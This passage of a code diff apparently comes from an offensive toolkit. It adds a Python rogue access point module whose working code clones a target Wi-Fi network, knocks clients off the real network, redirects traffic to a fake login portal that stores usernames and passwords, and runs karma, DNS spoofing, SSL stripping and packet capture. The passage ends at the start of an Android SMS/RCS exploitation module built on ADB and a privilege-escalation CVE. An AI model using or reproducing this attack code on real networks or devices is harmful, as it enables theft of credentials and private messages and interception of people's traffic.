target_ssid: str, target_bssid: str, interface: str, + internet_interface: str = None) -> Dict: + """Clone target AP config and start rogue AP with same parameters.""" + if self._ap_running: + return {'ok': False, 'error': 'AP already running. Stop it first.'} + if not target_ssid or not interface: + return {'ok': False, 'error': 'Target SSID and interface are required'} + + # Try to determine target channel + channel = 6 # default + if self.iw_bin: + try: + out = subprocess.check_output( + [self.iw_bin, 'dev', interface, 'scan'], + text=True, timeout=15, stderr=subprocess.DEVNULL + ) + # Parse scan output for the target BSSID/SSID + bss_block = '' + capture = False + for line in out.splitlines(): + if line.startswith('BSS '): + if capture and bss_block: + break + bssid_found = line.split()[1].split('(')[0].upper() + if target_bssid and bssid_found == target_bssid.upper(): + capture = True + bss_block = '' + else: + capture = False + if capture: + bss_block += line + '\n' + + if bss_block: + ch_m = re.search(r'DS Parameter set: channel (\d+)', bss_block) + if ch_m: + channel = int(ch_m.group(1)) + else: + ch_m = re.search(r'primary channel: (\d+)', bss_block) + if ch_m: + channel = int(ch_m.group(1)) + except Exception: + pass + + # Optionally deauth clients from real AP + if target_bssid and self.aireplay: + try: + subprocess.Popen( + [self.aireplay, '-0', '5', '-a', target_bssid, interface], + stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL + ) + except Exception: + pass # Non-fatal: deauth is optional + + # Start AP with cloned params + result = self.start_rogue_ap( + ssid=target_ssid, + interface=interface, + channel=channel, + encryption='open', + internet_interface=internet_interface + ) + + if result.get('ok'): + result['message'] = ( + f'Evil twin for "{target_ssid}" started on ch {channel}' + + (f' (cloned from {target_bssid})' if target_bssid else '') + ) + result['evil_twin'] = True + result['target_bssid'] = target_bssid + + return result + + # ── Captive Portal ─────────────────────────────────────────────────── + + def start_captive_portal(self, portal_type: str = 'hotel_wifi', + custom_html: str = None) -> Dict: + """Set up iptables to redirect HTTP to captive portal.""" + if not self._ap_running: + return {'ok': False, 'error': 'Start rogue AP first before enabling captive portal'} + if not self.iptables: + return {'ok': False, 'error': 'iptables not found'} + + ap_ip = '10.0.0.1' + + try: + # Redirect HTTP (port 80) to our portal server + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '80', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Redirect HTTPS (port 443) to portal as well + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Allow the redirect + subprocess.run([ + self.iptables, '-A', 'FORWARD', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '8080', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + self._portal_active = True + self._portal_type = portal_type + + # Save portal HTML for serving + if custom_html: + portal_html = custom_html + else: + portal_html = CAPTIVE_PORTAL_TEMPLATES.get(portal_type, '') + if not portal_html: + portal_html = CAPTIVE_PORTAL_TEMPLATES.get('hotel_wifi', '') + + portal_file = os.path.join(self.configs_dir, 'portal.html') + with open(portal_file, 'w') as f: + f.write(portal_html) + + success_file = os.path.join(self.configs_dir, 'portal_success.html') + with open(success_file, 'w') as f: + f.write(PORTAL_SUCCESS_PAGE) + + return { + 'ok': True, + 'message': f'Captive portal ({portal_type}) enabled', + 'portal_type': portal_type, + 'redirect_ip': ap_ip + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def stop_captive_portal(self) -> Dict: + """Remove captive portal iptables redirect rules.""" + if not self._portal_active: + return {'ok': False, 'error': 'No captive portal is running'} + + ap_ip = '10.0.0.1' + + try: + if self.iptables and self._ap_interface: + # Remove HTTP redirect + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '80', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Remove HTTPS redirect + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Remove forward rule + subprocess.run([ + self.iptables, '-D', 'FORWARD', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '8080', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + except Exception: + pass + + self._portal_active = False + self._portal_type = '' + return {'ok': True, 'message': 'Captive portal stopped'} + + def capture_portal_creds(self, data: Dict) -> Dict: + """Log credentials from portal form submission.""" + entry = { + 'timestamp': datetime.now().isoformat(), + 'username': data.get('username', ''), + 'password': data.get('password', ''), + 'email': data.get('email', ''), + 'domain': data.get('domain', ''), + 'provider': data.get('provider', ''), + 'ip': data.get('ip', ''), + 'user_agent': data.get('user_agent', ''), + } + + with self._lock: + self._portal_captures.append(entry) + self._save_captures() + + return {'ok': True, 'count': len(self._portal_captures)} + + def get_portal_captures(self) -> List[Dict]: + """Return all captured portal credentials.""" + return list(self._portal_captures) + + def get_portal_html(self) -> str: + """Return the current portal HTML page.""" + portal_file = os.path.join(self.configs_dir, 'portal.html') + if os.path.exists(portal_file): + with open(portal_file, 'r') as f: + return f.read() + # Default fallback + return CAPTIVE_PORTAL_TEMPLATES.get('hotel_wifi', 'Portal') + + def get_portal_success_html(self) -> str: + """Return the portal success page HTML.""" + success_file = os.path.join(self.configs_dir, 'portal_success.html') + if os.path.exists(success_file): + with open(success_file, 'r') as f: + return f.read() + return PORTAL_SUCCESS_PAGE + + # ── Karma Attack ───────────────────────────────────────────────────── + + def enable_karma(self, interface: str = None) -> Dict: + """Enable karma mode: respond to all probe requests.""" + iface = interface or self._ap_interface + if not iface: + return {'ok': False, 'error': 'No interface specified'} + if self._karma_active: + return {'ok': False, 'error': 'Karma mode is already active'} + + # Prefer hostapd-mana if available + hostapd_mana = find_tool('hostapd-mana') or shutil.which('hostapd-mana') + + if hostapd_mana: + # Generate karma-enabled hostapd-mana config + karma_conf = os.path.join(self.configs_dir, 'karma.conf') + conf_lines = [ + f'interface={iface}', + 'ssid=FreeWiFi', + 'channel=6', + 'driver=nl80211', + 'hw_mode=g', + 'enable_karma=1', + 'karma_black_white=0', + ] + with open(karma_conf, 'w') as f: + f.write('\n'.join(conf_lines) + '\n') + + try: + self._karma_proc = subprocess.Popen( + [hostapd_mana, karma_conf], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + if self._karma_proc.poll() is not None: + stderr = self._karma_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'hostapd-mana failed: {stderr[:200]}'} + + self._karma_active = True + return {'ok': True, 'message': 'Karma mode enabled via hostapd-mana'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # Fallback: airbase-ng for karma + elif self.airbase: + try: + self._karma_proc = subprocess.Popen( + [self.airbase, '-P', '-C', '30', '-e', 'FreeWiFi', '-v', iface], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + if self._karma_proc.poll() is not None: + stderr = self._karma_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'airbase-ng failed: {stderr[:200]}'} + + self._karma_active = True + return {'ok': True, 'message': 'Karma mode enabled via airbase-ng'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + return {'ok': False, 'error': 'Neither hostapd-mana nor airbase-ng found'} + + def disable_karma(self) -> Dict: + """Stop karma mode.""" + if not self._karma_active: + return {'ok': False, 'error': 'Karma mode is not active'} + + if self._karma_proc: + try: + self._karma_proc.terminate() + self._karma_proc.wait(timeout=5) + except Exception: + try: + self._karma_proc.kill() + except Exception: + pass + self._karma_proc = None + + self._karma_active = False + return {'ok': True, 'message': 'Karma mode disabled'} + + # ── Client Management ──────────────────────────────────────────────── + + def get_clients(self) -> List[Dict]: + """List connected clients from DHCP leases and ARP table.""" + clients = {} + + # Parse dnsmasq lease file + lease_file = os.path.join(self.data_dir, 'dnsmasq.leases') + if os.path.exists(lease_file): + try: + with open(lease_file, 'r') as f: + for line in f: + parts = line.strip().split() + if len(parts) >= 4: + mac = parts[1].upper() + ip = parts[2] + hostname = parts[3] if parts[3] != '*' else '' + clients[mac] = { + 'mac': mac, + 'ip': ip, + 'hostname': hostname, + 'os': self._fingerprint_os(hostname, mac), + 'first_seen': self._clients.get(mac, {}).get( + 'first_seen', datetime.now().isoformat()), + 'last_seen': datetime.now().isoformat(), + 'data_usage': self._clients.get(mac, {}).get('data_usage', 0) + } + except Exception: + pass + + # Supplement with ARP table + try: + arp_output = subprocess.check_output( + ['arp', '-an'], text=True, timeout=5, stderr=subprocess.DEVNULL + ) + for line in arp_output.splitlines(): + m = re.match(r'\S+\s+\((\d+\.\d+\.\d+\.\d+)\)\s+at\s+([0-9a-fA-F:]+)', line) + if m: + ip = m.group(1) + mac = m.group(2).upper() + if ip.startswith('10.0.0.') and mac not in clients: + clients[mac] = { + 'mac': mac, + 'ip': ip, + 'hostname': '', + 'os': '', + 'first_seen': self._clients.get(mac, {}).get( + 'first_seen', datetime.now().isoformat()), + 'last_seen': datetime.now().isoformat(), + 'data_usage': self._clients.get(mac, {}).get('data_usage', 0) + } + except Exception: + pass + + with self._lock: + self._clients.update(clients) + + return list(self._clients.values()) + + def kick_client(self, mac_address: str) -> Dict: + """Deauthenticate specific client from rogue AP.""" + if not self._ap_running: + return {'ok': False, 'error': 'AP is not running'} + if not mac_address: + return {'ok': False, 'error': 'MAC address is required'} + + mac = mac_address.upper() + + # Use aireplay-ng to send deauth + if self.aireplay and self._ap_interface: + try: + # Get the AP BSSID from interface + ap_mac = self._get_interface_mac(self._ap_interface) + if not ap_mac: + ap_mac = 'FF:FF:FF:FF:FF:FF' + + subprocess.run( + [self.aireplay, '-0', '3', '-a', ap_mac, '-c', mac, self._ap_interface], + capture_output=True, timeout=10 + ) + + # Remove from client list + if mac in self._clients: + del self._clients[mac] + + return {'ok': True, 'message': f'Deauth sent to {mac}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # Fallback: use hostapd_cli + hostapd_cli = shutil.which('hostapd_cli') + if hostapd_cli: + try: + subprocess.run( + [hostapd_cli, 'deauthenticate', mac], + capture_output=True, timeout=5 + ) + if mac in self._clients: + del self._clients[mac] + return {'ok': True, 'message': f'Client {mac} deauthenticated'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + return {'ok': False, 'error': 'No tool available to kick client'} + + # ── DNS Spoofing ───────────────────────────────────────────────────── + + def enable_dns_spoof(self, spoofs: Dict[str, str]) -> Dict: + """Configure dnsmasq to resolve specific domains to specified IPs.""" + if not spoofs: + return {'ok': False, 'error': 'No spoofs provided'} + + self._dns_spoofs = dict(spoofs) + self._dns_spoof_active = True + + # If AP is running, restart dnsmasq with new config + if self._ap_running: + return self._restart_dnsmasq() + + return { + 'ok': True, + 'message': f'DNS spoofing configured for {len(spoofs)} domain(s). ' + 'Spoofs will activate when AP starts.', + 'spoofs': spoofs + } + + def disable_dns_spoof(self) -> Dict: + """Restore normal DNS resolution.""" + self._dns_spoofs.clear() + self._dns_spoof_active = False + + if self._ap_running: + return self._restart_dnsmasq() + + return {'ok': True, 'message': 'DNS spoofing disabled'} + + # ── SSL Strip ──────────────────────────────────────────────────────── + + def enable_ssl_strip(self) -> Dict: + """Set up iptables + sslstrip to downgrade HTTPS connections.""" + if not self._ap_running: + return {'ok': False, 'error': 'Start rogue AP first'} + if self._sslstrip_active: + return {'ok': False, 'error': 'SSL strip is already running'} + if not self.sslstrip_bin: + return {'ok': False, 'error': 'sslstrip not found. Install with: pip install sslstrip'} + if not self.iptables: + return {'ok': False, 'error': 'iptables not found'} + + sslstrip_port = 10000 + + try: + # Enable IP forwarding + subprocess.run( + ['sysctl', '-w', 'net.ipv4.ip_forward=1'], + capture_output=True, timeout=5 + ) + + # Redirect HTTPS traffic to sslstrip + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'REDIRECT', '--to-port', str(sslstrip_port) + ], capture_output=True, timeout=5) + + # Start sslstrip + log_file = os.path.join(self.data_dir, 'sslstrip.log') + self._sslstrip_proc = subprocess.Popen( + [self.sslstrip_bin, '-l', str(sslstrip_port), '-w', log_file], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + + if self._sslstrip_proc.poll() is not None: + stderr = self._sslstrip_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'sslstrip failed: {stderr[:200]}'} + + self._sslstrip_active = True + return {'ok': True, 'message': f'SSL strip enabled on port {sslstrip_port}'} + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def disable_ssl_strip(self) -> Dict: + """Remove sslstrip iptables rules and stop sslstrip.""" + if not self._sslstrip_active: + return {'ok': False, 'error': 'SSL strip is not running'} + + sslstrip_port = 10000 + + # Kill sslstrip + if self._sslstrip_proc: + try: + self._sslstrip_proc.terminate() + self._sslstrip_proc.wait(timeout=5) + except Exception: + try: + self._sslstrip_proc.kill() + except Exception: + pass + self._sslstrip_proc = None + + # Remove iptables rule + if self.iptables and self._ap_interface: + try: + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'REDIRECT', '--to-port', str(sslstrip_port) + ], capture_output=True, timeout=5) + except Exception: + pass + + self._sslstrip_active = False + return {'ok': True, 'message': 'SSL strip disabled'} + + # ── Traffic Capture ────────────────────────────────────────────────── + + def sniff_traffic(self, interface: str = None, filter_expr: str = None, + duration: int = 60) -> Dict: + """Capture packets from connected clients.""" + iface = interface or self._ap_interface + if not iface: + return {'ok': False, 'error': 'No interface specified'} + if not self.tcpdump: + return {'ok': False, 'error': 'tcpdump not found'} + if self._sniff_proc and self._sniff_proc.poll() is None: + return {'ok': False, 'error': 'Capture already running. Stop it first.'} + + cap_file = os.path.join( + self.traffic_dir, f'traffic_{int(time.time())}.pcap' + ) + + cmd = [self.tcpdump, '-i', iface, '-w', cap_file, '-c', '10000'] + if filter_expr: + cmd.extend(filter_expr.split()) + + try: + self._sniff_proc = subprocess.Popen( + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + + # Schedule auto-stop + def _auto_stop(): + time.sleep(duration) + if self._sniff_proc and self._sniff_proc.poll() is None: + try: + self._sniff_proc.send_signal(signal.SIGINT) + self._sniff_proc.wait(timeout=5) + except Exception: + pass + + threading.Thread(target=_auto_stop, daemon=True).start() + + return { + 'ok': True, + 'message': f'Traffic capture started on {iface} ({duration}s)', + 'capture_file': cap_file, + 'pid': self._sniff_proc.pid + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def stop_sniff(self) -> Dict: + """Stop traffic capture.""" + if self._sniff_proc and self._sniff_proc.poll() is None: + try: + self._sniff_proc.send_signal(signal.SIGINT) + self._sniff_proc.wait(timeout=5) + except Exception: + try: + self._sniff_proc.kill() + except Exception: + pass + self._sniff_proc = None + return {'ok': True, 'message': 'Traffic capture stopped'} + return {'ok': False, 'error': 'No capture running'} + + def get_traffic_stats(self) -> Dict: + """Get bandwidth usage, top domains, top clients.""" + stats = { + 'total_bytes': 0, + 'top_domains': [], + 'top_clients': [], + 'capture_files': [] + } + + # Parse dnsmasq query log for top domains + log_file = os.path.join(self.data_dir, 'dnsmasq.log') + domain_counts: Dict[str, int] = {} + if os.path.exists(log_file): + try: + with open(log_file, 'r') as f: + for line in f: + m = re.search(r'query\[A\]\s+(\S+)\s+from\s+(\S+)', line) + if m: + domain = m.group(1) + client_ip = m.group(2) + domain_counts[domain] = domain_counts.get(domain, 0) + 1 + except Exception: + pass + + stats['top_domains'] = sorted( + [{'domain': k, 'queries': v} for k, v in domain_counts.items()], + key=lambda x: x['queries'], reverse=True + )[:20] + + # Client data from leases + client_usage = {} + for mac, info in self._clients.items(): + client_usage[mac] = { + 'mac': mac, + 'ip': info.get('ip', ''), + 'hostname': info.get('hostname', ''), + 'data_usage': info.get('data_usage', 0) + } + + stats['top_clients'] = sorted( + list(client_usage.values()), + key=lambda x: x['data_usage'], reverse=True + )[:20] + + # List traffic capture files + try: + traffic_path = Path(self.traffic_dir) + for f in sorted(traffic_path.glob('*.pcap'), reverse=True): + stats['capture_files'].append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat() + }) + except Exception: + pass + + return stats + + # ── NAT / iptables Helpers ─────────────────────────────────────────── + + def _setup_nat(self, ap_iface: str, inet_iface: str, subnet: str): + """Set up NAT forwarding between AP and internet interface.""" + if not self.iptables: + return + + try: + # Enable IP forwarding + subprocess.run( + ['sysctl', '-w', 'net.ipv4.ip_forward=1'], + capture_output=True, timeout=5 + ) + + # NAT masquerade + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'POSTROUTING', + '-o', inet_iface, '-j', 'MASQUERADE' + ], capture_output=True, timeout=5) + + # Allow forwarding + subprocess.run([ + self.iptables, '-A', 'FORWARD', + '-i', ap_iface, '-o', inet_iface, '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + subprocess.run([ + self.iptables, '-A', 'FORWARD', + '-i', inet_iface, '-o', ap_iface, + '-m', 'state', '--state', 'RELATED,ESTABLISHED', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + except Exception: + pass + + def _teardown_nat(self, ap_iface: str, inet_iface: str): + """Remove NAT forwarding rules.""" + if not self.iptables: + return + + try: + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'POSTROUTING', + '-o', inet_iface, '-j', 'MASQUERADE' + ], capture_output=True, timeout=5) + + subprocess.run([ + self.iptables, '-D', 'FORWARD', + '-i', ap_iface, '-o', inet_iface, '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + subprocess.run([ + self.iptables, '-D', 'FORWARD', + '-i', inet_iface, '-o', ap_iface, + '-m', 'state', '--state', 'RELATED,ESTABLISHED', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + except Exception: + pass + + def _restart_dnsmasq(self) -> Dict: + """Restart dnsmasq with current configuration (including DNS spoofs).""" + if self._dnsmasq_proc: + try: + self._dnsmasq_proc.terminate() + self._dnsmasq_proc.wait(timeout=5) + except Exception: + try: + self._dnsmasq_proc.kill() + except Exception: + pass + + ap_ip = '10.0.0.1' + dnsmasq_conf = os.path.join(self.configs_dir, 'dnsmasq.conf') + dns_lines = [ + f'interface={self._ap_interface}', + 'bind-interfaces', + f'dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h', + f'dhcp-option=3,{ap_ip}', + f'dhcp-option=6,{ap_ip}', + 'server=8.8.8.8', + 'server=8.8.4.4', + 'log-queries', + f'log-facility={os.path.join(self.data_dir, "dnsmasq.log")}', + f'dhcp-leasefile={os.path.join(self.data_dir, "dnsmasq.leases")}', + ] + + if self._dns_spoof_active and self._dns_spoofs: + for domain, ip in self._dns_spoofs.items(): + dns_lines.append(f'address=/{domain}/{ip}') + + with open(dnsmasq_conf, 'w') as f: + f.write('\n'.join(dns_lines) + '\n') + + try: + self._dnsmasq_proc = subprocess.Popen( + [self.dnsmasq, '-C', dnsmasq_conf, '-d'], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(0.5) + if self._dnsmasq_proc.poll() is not None: + stderr = self._dnsmasq_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'dnsmasq restart failed: {stderr[:200]}'} + + msg = 'dnsmasq restarted' + if self._dns_spoof_active: + msg += f' with {len(self._dns_spoofs)} DNS spoof(s)' + return {'ok': True, 'message': msg} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Internal Helpers ───────────────────────────────────────────────── + + def _get_interface_mac(self, interface: str) -> str: + """Get MAC address of an interface.""" + try: + mac_file = Path(f'/sys/class/net/{interface}/address') + if mac_file.exists(): + return mac_file.read_text().strip().upper() + except Exception: + pass + + if self.ip_bin: + try: + out = subprocess.check_output( + [self.ip_bin, 'link', 'show', interface], + text=True, timeout=5 + ) + m = re.search(r'link/ether\s+([0-9a-fA-F:]+)', out) + if m: + return m.group(1).upper() + except Exception: + pass + return '' + + def _fingerprint_os(self, hostname: str, mac: str) -> str: + """Basic OS fingerprinting from hostname and MAC OUI.""" + hostname_lower = hostname.lower() if hostname else '' + + if 'iphone' in hostname_lower or 'ipad' in hostname_lower: + return 'iOS' + if 'android' in hostname_lower or 'galaxy' in hostname_lower or 'pixel' in hostname_lower: + return 'Android' + if 'macbook' in hostname_lower or 'imac' in hostname_lower: + return 'macOS' + if hostname_lower.startswith('desktop-') or hostname_lower.startswith('laptop-'): + return 'Windows' + + # OUI-based fingerprinting + oui = mac[:8].upper() if mac else '' + apple_ouis = [ + '00:03:93', '00:05:02', '00:0A:27', '00:0A:95', '00:0D:93', + '00:10:FA', '00:11:24', '00:14:51', '00:16:CB', '00:17:F2', + '00:19:E3', '00:1B:63', '00:1C:B3', '00:1D:4F', '00:1E:52', + '00:1E:C2', '00:1F:5B', '00:1F:F3', '00:21:E9', '00:22:41', + '00:23:12', '00:23:32', '00:23:6C', '00:23:DF', '00:24:36', + '00:25:00', '00:25:4B', '00:25:BC', '00:26:08', '00:26:4A', + '00:26:B0', '00:26:BB', '3C:07:54', '7C:D1:C3', 'A4:83:E7', + 'AC:BC:32', 'B8:53:AC', 'D0:E1:40', 'F0:B4:79', 'F4:5C:89', + ] + if oui in apple_ouis: + return 'Apple' + + samsung_ouis = ['00:07:AB', '00:12:47', '00:15:99', '00:16:32', '00:17:D5', + '00:18:AF', '00:1A:8A', '00:1B:98', '00:1C:43', '00:1D:25', + '00:1E:E1', '00:1E:E2', '00:21:19', '00:21:D1', '00:23:39', + '00:23:99', '00:23:D6', '00:23:D7', '00:24:54', '00:24:90', + '00:24:91', '00:25:66', '00:25:67', '00:26:37', '00:26:5D'] + if oui in samsung_ouis: + return 'Android (Samsung)' + + return '' + + def _save_captures(self): + """Persist captured credentials to disk.""" + cap_file = os.path.join(self.data_dir, 'portal_captures.json') + try: + with open(cap_file, 'w') as f: + json.dump(self._portal_captures, f, indent=2) + except Exception: + pass + + def _load_captures(self): + """Load persisted captures from disk.""" + cap_file = os.path.join(self.data_dir, 'portal_captures.json') + if os.path.exists(cap_file): + try: + with open(cap_file, 'r') as f: + self._portal_captures = json.load(f) + except Exception: + self._portal_captures = [] + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_pineapple() -> PineappleAP: + global _instance + if _instance is None: + _instance = PineappleAP() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for WiFi Pineapple / Rogue AP module.""" + ap = get_pineapple() + + while True: + status = ap.get_status() + tools = ap.get_tools_status() + available = sum(1 for v in tools.values() if v) + + print(f"\n{'='*60}") + print(f" WiFi Pineapple / Rogue AP ({available}/{len(tools)} tools)") + print(f"{'='*60}") + if status['running']: + print(f" AP Status: RUNNING") + print(f" SSID: {status['ssid']} Channel: {status['channel']}") + print(f" Interface: {status['interface']}") + print(f" Clients: {status['client_count']}") + if status['portal_active']: + print(f" Portal: {status['portal_type']}") + if status['karma_active']: + print(f" Karma: ACTIVE") + if status['dns_spoof_active']: + print(f" DNS Spoofs: {len(status['dns_spoofs'])} entries") + else: + print(f" AP Status: STOPPED") + print() + print(" 1 — Start Rogue AP") + print(" 2 — Stop Rogue AP") + print(" 3 — Evil Twin Attack") + print(" 4 — Captive Portal") + print(" 5 — View Clients") + print(" 6 — DNS Spoof") + print(" 7 — Karma Attack") + print(" 8 — SSL Strip") + print(" 9 — View Captures") + print(" 10 — Traffic Stats") + print(" 11 — Tool Status") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + + elif choice == '1': + ifaces = ap.get_interfaces() + wireless = [i for i in ifaces if i.get('wireless', True)] + if wireless: + print(" Wireless interfaces:") + for i, ifc in enumerate(wireless): + print(f" {i+1}. {ifc['name']} (mode={ifc['mode']}, ch={ifc['channel']})") + ssid = input(" SSID: ").strip() + iface = input(" Interface: ").strip() + ch = input(" Channel (default 6): ").strip() + enc = input(" Encryption (open/wpa2, default open): ").strip() or 'open' + pwd = '' + if enc in ('wpa', 'wpa2'): + pwd = input(" Password: ").strip() + inet = input(" Internet interface (blank=none): ").strip() or None + result = ap.start_rogue_ap( + ssid, iface, int(ch) if ch.isdigit() else 6, + enc, pwd, inet + ) + print(f" {result.get('message', result.get('error', 'Unknown'))}") + + elif choice == '2': + result = ap.stop_rogue_ap() + print(f" {result.get('message', result.get('error'))}") + + elif choice == '3': + target = input(" Target SSID: ").strip() + bssid = input(" Target BSSID: ").strip() + iface = input(" Interface: ").strip() + inet = input(" Internet interface (blank=none): ").strip() or None + result = ap.evil_twin(target, bssid, iface, inet) + print(f" {result.get('message', result.get('error'))}") + + elif choice == '4': + print(" Portal types: hotel_wifi, corporate, social_login, terms_accept") + ptype = input(" Portal type: ").strip() or 'hotel_wifi' + if ap._portal_active: + result = ap.stop_captive_portal() + else: + result = ap.start_captive_portal(ptype) + print(f" {result.get('message', result.get('error'))}") + + elif choice == '5': + clients = ap.get_clients() + if clients: + print(f" Connected clients ({len(clients)}):") + for c in clients: + print(f" {c['mac']} {c['ip']:<15} {c['hostname']:<20} {c['os']}") + else: + print(" No connected clients") + + elif choice == '6': + if ap._dns_spoof_active: + result = ap.disable_dns_spoof() + else: + spoofs = {} + while True: + domain = input(" Domain (blank to finish): ").strip() + if not domain: + break + ip = input(f" IP for {domain}: ").strip() + if ip: + spoofs[domain] = ip + if spoofs: + result = ap.enable_dns_spoof(spoofs) + else: + result = {'ok': False, 'error': 'No spoofs entered'} + print(f" {result.get('message', result.get('error'))}") + + elif choice == '7': + if ap._karma_active: + result = ap.disable_karma() + else: + iface = input(" Interface (blank=AP interface): ").strip() or None + result = ap.enable_karma(iface) + print(f" {result.get('message', result.get('error'))}") + + elif choice == '8': + if ap._sslstrip_active: + result = ap.disable_ssl_strip() + else: + result = ap.enable_ssl_strip() + print(f" {result.get('message', result.get('error'))}") + + elif choice == '9': + captures = ap.get_portal_captures() + if captures: + print(f" Captured credentials ({len(captures)}):") + for c in captures: + print(f" [{c['timestamp'][:19]}] user={c['username']} " + f"pass={c['password']} ip={c['ip']}") + else: + print(" No captures yet") + + elif choice == '10': + stats = ap.get_traffic_stats() + if stats['top_domains']: + print(" Top domains:") + for d in stats['top_domains'][:10]: + print(f" {d['domain']:<40} {d['queries']} queries") + else: + print(" No traffic data") + + elif choice == '11': + for tool, avail in tools.items(): + status_str = 'OK' if avail else 'MISSING' + print(f" {tool:<15} {status_str}") diff --git a/modules/rcs_tools.py b/modules/rcs_tools.py new file mode 100644 index 0000000..0f42c37 --- /dev/null +++ b/modules/rcs_tools.py @@ -0,0 +1,1969 @@ +"""AUTARCH RCS/SMS Exploitation v2.0 + +Comprehensive RCS/SMS message extraction, forging, modification, and exploitation +on connected Android devices via ADB content provider commands, Shizuku shell +access, CVE-2024-0044 privilege escalation, AOSP RCS provider queries, and +Archon app integration. + +All operations execute on the target phone — nothing runs locally except +command dispatch and output parsing. Messages in bugle_db are stored as +PLAINTEXT after E2EE decryption, so no key extraction is needed for reading. + +Exploitation paths (in order of preference): + 1. Content providers (UID 2000 / shell — no root needed) + 2. Archon app relay (READ_SMS + Shizuku → bugle_db access) + 3. CVE-2024-0044 (Android 12-13 pre-Oct 2024 — full app-UID access) + 4. ADB backup (deprecated on Android 12+ but works on some devices) + 5. Root (if available) +""" + +DESCRIPTION = "RCS/SMS Exploitation — Database extraction, forging, backup & spoofing" +AUTHOR = "AUTARCH" +VERSION = "2.0" +CATEGORY = "offense" + +import os +import re +import csv +import json +import time +import shlex +import struct +import sqlite3 +import subprocess +import threading +import zlib +from io import StringIO +from pathlib import Path +from datetime import datetime, timezone, timedelta +from typing import Dict, List, Optional, Any, Tuple +from xml.etree import ElementTree as ET + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + import shutil as _sh + + def find_tool(name): + return _sh.which(name) + + def get_data_dir(): + return Path(__file__).resolve().parent.parent / 'data' + + +# ── Module-level singleton ────────────────────────────────────────────────── + +_instance: Optional['RCSTools'] = None + + +def get_rcs_tools() -> 'RCSTools': + global _instance + if _instance is None: + _instance = RCSTools() + return _instance + + +# ── Constants ──────────────────────────────────────────────────────────────── + +# Standard Android telephony content providers (accessible at UID 2000) +SMS_URI = 'content://sms/' +SMS_INBOX_URI = 'content://sms/inbox' +SMS_SENT_URI = 'content://sms/sent' +SMS_DRAFT_URI = 'content://sms/draft' +SMS_OUTBOX_URI = 'content://sms/outbox' +MMS_URI = 'content://mms/' +MMS_INBOX_URI = 'content://mms/inbox' +MMS_SENT_URI = 'content://mms/sent' +MMS_PART_URI = 'content://mms/part' +MMS_SMS_CONVERSATIONS_URI = 'content://mms-sms/conversations' +MMS_SMS_DRAFT_URI = 'content://mms-sms/draft' +MMS_SMS_UNDELIVERED_URI = 'content://mms-sms/undelivered' +MMS_SMS_LOCKED_URI = 'content://mms-sms/locked' + +# AOSP RCS content provider (authority: "rcs") +RCS_THREAD_URI = 'content://rcs/thread' +RCS_P2P_THREAD_URI = 'content://rcs/p2p_thread' +RCS_GROUP_THREAD_URI = 'content://rcs/group_thread' +RCS_PARTICIPANT_URI = 'content://rcs/participant' +RCS_MESSAGE_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/message' +RCS_FILE_TRANSFER_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/file_transfer' +RCS_INCOMING_MSG_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/incoming_message' +RCS_OUTGOING_MSG_URI_FMT = 'content://rcs/p2p_thread/{thread_id}/outgoing_message' + +# Google 